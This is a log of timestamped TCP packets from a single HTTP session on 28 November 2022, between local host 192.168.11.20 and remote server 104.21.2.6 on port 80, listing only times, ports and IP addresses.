Nov 28, 2022 16:37:03.829164028 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.829174042 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.829185963 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.829196930 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.829205990 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.829235077 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.829400063 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.829514980 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.829631090 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.829716921 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.829729080 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.829742908 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.829755068 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.829766989 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.829778910 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.829797983 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.829809904 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.829822063 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.829824924 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.829839945 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.829852104 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.829876900 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.829889059 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.829900980 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.830188990 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.830188990 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.830415964 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.830509901 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.830530882 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.830555916 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.830568075 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.830579996 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.830591917 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.830604076 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.830615044 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.830677032 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.830699921 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.830718994 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.830739021 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.830760002 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.830780029 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.830800056 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.830816031 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.830827951 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.830847025 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.831038952 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.831186056 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.831393003 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.831484079 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.831527948 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.831540108 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.831557989 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.831573009 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.831579924 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.831592083 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.831604004 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.831640005 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.831659079 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.831679106 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.831696987 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.831708908 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.831721067 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.831732988 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.831744909 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.831799984 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.831799984 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.831799984 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.832165003 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.832324028 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.832393885 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.832439899 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.832451105 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.832462072 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.832473040 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.832484007 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.832494974 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.832504988 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.832511902 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.832524061 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.832535028 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.832545996 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.832556963 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.832570076 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.832581043 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.832592010 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.832730055 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.832730055 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.832931042 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.833231926 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.833398104 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.833424091 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.833444118 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.833456039 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.833467007 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.833477974 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.833488941 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.833528996 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.833539963 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.833550930 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.833561897 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.833573103 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.833583117 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.833590031 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.833590031 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.833604097 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.833616018 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.833760977 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.833760977 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.833930016 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.834176064 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.834270000 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.834321976 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.834347010 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.834367037 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.834388018 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.834408998 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.834429979 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.834443092 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.834443092 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.834470034 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.834494114 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.834517956 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.834541082 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.834561110 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.834582090 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.834610939 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.834610939 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.834660053 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.834706068 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.834779978 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.834949017 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.835108042 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.835119963 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.835233927 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.835256100 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.835289001 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.835341930 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.835400105 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.835418940 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.835439920 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.835454941 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.835465908 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.835495949 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.835508108 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.835519075 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.835530996 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.835546970 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.835556984 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.835556984 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.835566998 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.835577965 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.835589886 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.835601091 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.835727930 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.835728884 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.835896969 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.836113930 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.836230993 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.836286068 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.836299896 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.836321115 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.836349010 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.836396933 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.836407900 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.836450100 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.836462021 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.836473942 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.836484909 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.836529016 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.836559057 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.836570024 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.836595058 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.836674929 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.836844921 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.837094069 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.837208986 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.837220907 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.837245941 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.837287903 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.837311983 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.837332964 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.837357044 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.837378025 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.837399006 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.837419987 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.837440014 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.837461948 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.837482929 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.837503910 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.837508917 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.837508917 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.837527037 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.837538958 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.837677956 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.837677956 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.837846994 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.838006020 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.838138103 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.838187933 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.838284969 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.844175100 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.845835924 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.845920086 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.845942020 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.845964909 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.845994949 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.846009970 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.846020937 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.846033096 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.846044064 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.846055984 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.846067905 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.846079111 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.846091032 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.846101999 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.846113920 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.846126080 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.846137047 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.846148968 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.846194029 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.846363068 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.846385002 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.846396923 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.846409082 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.846420050 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.846431971 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.846441031 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.846452951 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.846463919 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.846476078 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.846487045 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.846498966 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.846508980 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.846673012 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.846688032 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.846698999 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.846710920 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.846723080 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.846735001 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.846745968 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.846757889 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.846769094 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.846781015 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.846791983 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.846803904 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.846815109 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.846829891 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.846847057 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.846851110 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.846851110 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.846868038 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.846884966 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.846904039 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.846924067 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.846946001 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.847033024 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.847209930 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.847233057 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.847347021 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.847501040 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.847516060 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.847527981 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.847539902 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.847551107 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.847562075 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.847573042 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.847584009 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.847594023 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.847610950 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.847625971 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.847636938 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.847650051 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.847668886 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.847687960 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.847687960 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.847701073 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.847718000 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.847728968 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.847740889 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.847753048 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.847764969 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.847881079 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.847938061 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.847959042 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.847979069 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.847999096 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.848018885 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.848077059 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.848228931 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.848246098 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.848246098 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.848417044 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.848520994 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.848537922 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.848550081 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.848560095 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.848571062 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.848582029 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.848594904 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.848606110 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.848617077 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.848628044 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.848639011 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.848649025 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.848659992 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.848670959 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.848689079 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.848707914 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.848726988 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.848740101 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.848751068 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.848756075 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.848768950 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.848779917 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.848790884 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.848802090 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.848812103 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.848926067 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.849095106 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.849109888 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.849225998 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.849240065 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.849272013 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.849292040 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.849312067 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.849332094 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.849436998 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.849436998 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.849605083 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.853055954 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.853188038 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.853202105 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.853215933 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.853226900 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.853238106 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.853249073 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.853260994 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.853271961 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.853282928 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.853292942 CET	80	49830	104.21.2.6	192.168.11.20
